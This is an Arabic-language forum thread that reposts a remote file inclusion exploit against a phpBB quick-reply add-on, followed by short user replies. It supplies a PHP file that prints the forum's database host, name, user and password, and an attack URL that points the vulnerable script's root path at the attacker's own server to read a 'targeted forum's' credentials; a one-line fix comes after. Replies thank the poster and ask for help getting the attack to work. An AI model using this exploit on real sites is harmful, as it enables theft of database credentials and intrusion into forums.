عند تركيبك لهاك الرد السريع
سوف تجد هذا الكود


if ( $mode == 'smilies' )
{
define('IN_PHPBB', true);
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
include($phpbb_root_path . 'includes/functions_post.'.$phpEx);
generate_smilies('window', PAGE_POSTING);
exit;
}



دقق جيدا بهذا الكود
ثم أنشاء ملف جديد سمه extension.inc

وضع داخلها مثلا
شفرة

<?php
include('config'.'.php');
echo "DB Type: $dbms <br>";
echo "DB Host: $dbhost <br>";
echo "DB Name: $dbname <br>";
echo "DB User: $dbuser <br>";
echo "DB Pass: $dbpasswd <br>";
exit;
?>



يمكنك وض الخيارات التي تود مشاهدتها من الهاك

الآن وبكل سهولة بعد تنزيل extension.inc الى موقع يدعم البي اتش بي
أتجه الى هذا العنوان

URL: http://[phpBB_Forum]/quick_reply.php?phpbb_root_path=http://[Your Server]/&mode=smiles

بسهولة أستبدل
[phpBB_Forum]
بعنوان المنتدى المستهدف
[Your Server]
بعنوان الموقع الذي قمت بوضع الملف اللذي أنشائناه به

ماذا ترى؟؟؟
معلومات قاعدة البيانات بين ايديك

الحل لهذه الثغرة الخطيرة والتي شردت الكثير من المنتديات :

ببساطة أفتح الملف quick_reply.php
أبحث عن
if ( $mode == 'smilies' )
أَضف بعدها مباشرة
phpbb_root_path = "./";

وانشاءالله انحلت المشكلة

كاشف الثغرة : Hai Nam Luke

الموضوع منقول
وشكرا

:)تسلم والله اخوي على الثغرة الحلوة
سلاااااام

مشكور أخوي ..


لاكن إمتداد inc بأي برنامج أسويه ؟

اخوي Ksa AL7ob
افتح مفكرة وحط فيها الكود
وبعدين اذا جيت تسوي له حفظ زيد على الاسم INC وينحفظ على شكل مفكرة بامتداد INC

سلام ..

مشكور على الثغرة بس عندي كم سؤال اذا تقدر تجاوبني يعني

اولا اي الاصدارات من ال phpbb تشتغل عليها الثغرة

و ثانيا انا جربت مثل ما قلت من موقعي على اللايكوس و ما يصير شي يطلع لي 404

:p

مشكوور عزيزي

أخي مغادر الحياة

يطلعلي :

Hacking attempt

مع اني نسخت نفس الكود بالضبط

مشكوووووور وماقصرت:rolleyes::)

ThAnX